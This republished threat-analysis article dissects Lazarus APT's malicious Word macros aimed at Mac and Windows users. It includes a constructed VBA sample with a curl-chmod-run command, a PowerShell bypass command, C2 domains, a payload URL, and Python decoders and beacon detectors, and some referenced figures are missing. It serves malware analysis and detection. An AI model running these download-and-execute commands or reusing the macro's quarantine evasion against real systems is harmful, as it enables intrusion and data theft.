
How to deeply analyze the malicious Word documents used by Lazarus APT against Mac users

Updated 2025-01-30, from SLTechnology News&Howtos, Network Security

Shulou (Shulou.com) 05/31 Report

This article analyzes the malicious Word documents that the Lazarus APT group used against Mac users and walks through the analysis and its findings in detail, in the hope of helping readers who want to understand this problem find a simpler way in.

Just last month, Kaspersky Lab researchers discovered a malicious attack campaign targeting macOS and Windows users and named it "Lazarus APT." It is understood that this attack is mainly aimed at users in the financial field, and the most seriously affected are users of cryptocurrency trading platforms. Lazarus, aka Hidden Cobra, has been active since 2009. Do you remember Sony Japan experienced a serious cyber attack in 2014? Yeah, Lazarus did that, too.

We will focus on the attack logic Lazarus uses to attack macOS and Windows systems, as well as malicious Word documents.

In fact, using VBA macros to create malicious Microsoft Office documents is nothing new, especially for Trojans targeting banking institutions. However, we rarely see malicious Word documents targeting macOS, which is why it is worth looking at the technical details of the Lazarus attack that Kaspersky's security report does not cover.

Malicious Word document with macros enabled

Below is a sample of Lazarus malicious documents targeting users in South Korea:

Oddly enough, Kaspersky's researchers found that the attacks started around the end of 2018, but the creation date noted in the document was four years earlier, namely November 3, 2014. As far as the content of the document is concerned, it purports to have been provided by a company named "Han Seung" and its representative, "Jin Seok Kim."

We found several companies called "Han Seung" in search engines, but none of them had "Jin Seok Kim" as an employee. Therefore, we believe that either the company name in the malicious document is false, or the representative name is false, or it is all false.

We used oletools to extract the VBA code from the malicious document. From it we can see that the document first tests whether it is running on macOS and, if so, declares the system and popen functions, with the declaration depending on the VBA version.

If the target system is not macOS, the document defines 144 separate data arrays of ASCII codes that are assembled into a complete PowerShell script.

The script snippet after refactoring is as follows:

When everything is ready, the code defines an AutoOpen() subroutine and tests again whether the target platform is macOS or Windows.

In the macOS branch, the code downloads the payload through the system function (a curl command writing to /tmp) from the following URL:

https//nzssdm.com/assets/mt.dat

The code then uses chmod to make the payload executable and runs it. Because the file is fetched with curl rather than a browser, it carries no quarantine attribute, so neither Gatekeeper nor XProtect inspects it.

The Windows branch builds a string containing the following PowerShell command:

powershell -ExecutionPolicy Bypass -file spath

Here spath is a randomly generated file name of 13 random characters with .ps1 appended as the extension, saved in the target user's temp directory.
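To make the two macro traits described above concrete for triage, the following added example (written for this article, not code from the sample or from oletools) decodes numeric Array() literals of ASCII codes back into the text they build and lists the macOS-specific indicators present in a macro dump. The VBA text, the URL and the arrays are constructed; a real sample uses 144 arrays.

```python
import re

# Constructed stand-in for an olevba dump of a macro of this kind: a Mac-only
# declaration of the libc system() call, numeric arrays that encode a PowerShell
# command, and an AutoOpen() that runs curl/chmod on macOS. Placeholder URL.
SAMPLE_VBA = r'''
#If Mac Then
    #If VBA7 Then
        Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
    #Else
        Private Declare Function system Lib "libc.dylib" (ByVal command As String) As Long
    #End If
#End If
Dim a1: a1 = Array(112, 111, 119, 101, 114, 115, 104, 101, 108, 108, 32)
Dim a2: a2 = Array(45, 69, 120, 101, 99, 117, 116, 105, 111, 110, 80, 111, 108, 105, 99, 121, 32, _
    66, 121, 112, 97, 115, 115)
Sub AutoOpen()
    #If Mac Then
        system ("curl -o /tmp/mt.dat https://EXAMPLE.invalid/mt.dat; chmod +x /tmp/mt.dat; /tmp/mt.dat")
    #End If
End Sub
'''

# Numeric Array(...) literals, allowing VBA line continuations ("_") inside them.
ARRAY_RE = re.compile(r'Array\(([\d,\s_]+)\)')

def decode_ascii_arrays(vba_src):
    """Concatenate every numeric Array() literal into the string it encodes."""
    chunks = []
    for m in ARRAY_RE.finditer(vba_src):
        body = re.sub(r'[\s_]', '', m.group(1))
        codes = [int(c) for c in body.split(',') if c]
        chunks.append(''.join(chr(c) for c in codes if 0 <= c < 128))
    return ''.join(chunks)

# Strings that a Windows-only macro has no reason to contain.
MAC_INDICATORS = ('#If Mac', 'libc.dylib', 'popen', 'system', 'curl', 'chmod', '/tmp/')

def mac_indicators(vba_src):
    """Return the macOS-targeting indicators found in the macro source, sorted."""
    return sorted(i for i in MAC_INDICATORS if i in vba_src)
```

Run against a real olevba dump, decode_ascii_arrays() yields the PowerShell script the Windows branch assembles, while a non-empty mac_indicators() result marks the document as one of the rare macOS-aware macros.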

macOS backdoor

The payload file mt.dat is a 64-bit Mach-O executable, and its symbol table indicates that this is a custom backdoor. The purpose of some symbols can be guessed from their names, such as CheckUSB and ReplyOtherShellCmd, while functions containing the string "Troy" are less obvious. Some readers may know that "Troy" is a well-known malware campaign that mainly targeted Korean users.

From here, it is clear that these commands are sent from the C2 server, and static analysis also shows that the ReplyTroyInfo method first obtains the host name of the target device, then collects network information, and finally encrypts the collected data and exfiltrates it to the remote server.

The attackers also attempted to evade legacy antivirus engines that rely on string-based signature matching, for example:

After executing the malicious file, we found that the malware attempts to communicate with three different C2 server addresses. Every 60 seconds, the malware calls curl_easy_perform to attempt a connection to one of the hardcoded server addresses. If the connection fails, the process sleeps for 60 seconds and tries the next server.

The list of server addresses in the sample is as follows:

https://baseballcharlemagnelegardeur.com

https://www.tangowithcolette.com

https://towingoperations.com
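The try-one-server, sleep 60 seconds, try-the-next loop described above leaves a very regular trace in outbound proxy logs. The following added example (written for this article, not part of the original analysis) flags client/host pairs whose connection gaps form a steady timer; the log lines, client addresses and host names are constructed, and the three rotated hosts stand in for the real C2 servers.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean

# Constructed proxy log (not from the article): "<ISO time> <client> <host> <status>".
# 10.0.0.5 behaves like the backdoor: three hosts tried in rotation, one attempt per
# minute, each refused with HTTP 406. 10.0.0.9 and cdn.example are ordinary noise.
SAMPLE_LOG = """\
2019-05-20T10:00:00 10.0.0.5 c2-a.example 406
2019-05-20T10:00:41 10.0.0.9 news.example 200
2019-05-20T10:01:00 10.0.0.5 c2-b.example 406
2019-05-20T10:02:00 10.0.0.5 c2-c.example 406
2019-05-20T10:02:12 10.0.0.5 cdn.example 200
2019-05-20T10:03:02 10.0.0.5 c2-a.example 406
2019-05-20T10:03:58 10.0.0.9 news.example 200
2019-05-20T10:04:00 10.0.0.5 c2-b.example 406
2019-05-20T10:04:59 10.0.0.5 c2-c.example 406
2019-05-20T10:06:00 10.0.0.5 c2-a.example 406
2019-05-20T10:07:00 10.0.0.5 c2-b.example 406
2019-05-20T10:08:00 10.0.0.5 c2-c.example 406
"""

def connections(log):
    """Yield (client, host, timestamp) for each log line."""
    for line in log.splitlines():
        ts, client, host, _status = line.split()
        yield client, host, datetime.fromisoformat(ts)

def find_beacons(log, min_hits=3, jitter=5.0, min_period=30.0):
    """Return {client: {host: period_seconds}} for client/host pairs whose
    connection gaps all lie within `jitter` seconds of their mean, i.e. a timer.
    Several hosts with the same period and staggered start times are the
    rotation the backdoor performs (with three hosts, each is hit every 180 s)."""
    times = defaultdict(list)
    for client, host, ts in connections(log):
        times[(client, host)].append(ts)
    beacons = defaultdict(dict)
    for (client, host), stamps in times.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        period = mean(gaps)
        if period >= min_period and all(abs(g - period) <= jitter for g in gaps):
            beacons[client][host] = round(period)
    return dict(beacons)
```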

After probing the servers with netcat, we found that all of them were active:

However, we were unable to get the malware to complete its communication: every attempt to connect to a server returned a 406 error, indicating a problem with the request format:

We also obtained an encrypted file from the C2 server. The following is one of the URLs the malware communicates with:

https://www.tangowithcolette.com/pages/common.php

When downloading the file, we also found another reference address:

The "_Incapsule_Resource…" script contains a number of hexadecimal values:

After converting it to ASCII, we get an obfuscated JavaScript:

The script code is about 1400 lines long and includes URI component decoding, resource retrieval, cookie removal, and browser session modification.

This concludes our analysis of the malicious Word documents that Lazarus APT used against Mac users. We hope the above is of some help; if you still have unresolved questions, you can follow the industry information channel to learn more.